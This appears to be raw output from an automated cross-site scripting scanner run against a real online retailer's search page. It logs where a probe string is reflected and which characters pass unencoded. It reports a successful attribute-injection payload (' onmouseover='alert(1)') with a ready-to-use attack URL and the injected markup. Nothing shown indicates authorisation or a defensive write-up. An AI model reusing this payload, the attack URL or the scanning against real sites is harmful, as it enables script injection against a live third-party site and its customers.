https://www.armysurplusworld.com/checkout/cart/

GET Params:[1]
['q']
_______________________________________________________________________________________________________
https://www.armysurplusworld.com/catalogsearch/result/?q=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [1]
<input id="search" type="search" name="q" value="(uvw&quot;xyz'yxz&lt;/zxy" class="input-text required-entry" maxlength="128" placeholder="What can we help you find today?" />

----------------------------------------------------------------------------------
HTML Context: [3]
<title>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy' | Army Surplus World</title>
<strong>Search results for: '(uvw&quot;xyz'yxz&lt;/zxy'</strong>
<h1>Search results for '(uvw&quot;xyz'yxz&lt;/zxy'</h1>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [2]
<a href="https://www.armysurplusworld.com/catalogsearch/result/?q=(uvw"xyz'yxz</zxy"  class="contentSelect"  >
<a href="https://www.armysurplusworld.com/content/search/?q=(uvw"xyz'yxz</zxy" >

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	False

Attack Payloads for ATTR
["' onmouseover='alert(1)"]

ATTR Attack Url: https://www.armysurplusworld.com/catalogsearch/result/?q=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input id="search" type="search" name="q" value="' onmouseover='alert(1)" class="input-text required-entry" maxlength="128" placeholder="What can we help you find today?" />
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	False

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	False	False

Attack Payloads for URL
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	False	False

Attack Payloads for URL
[]
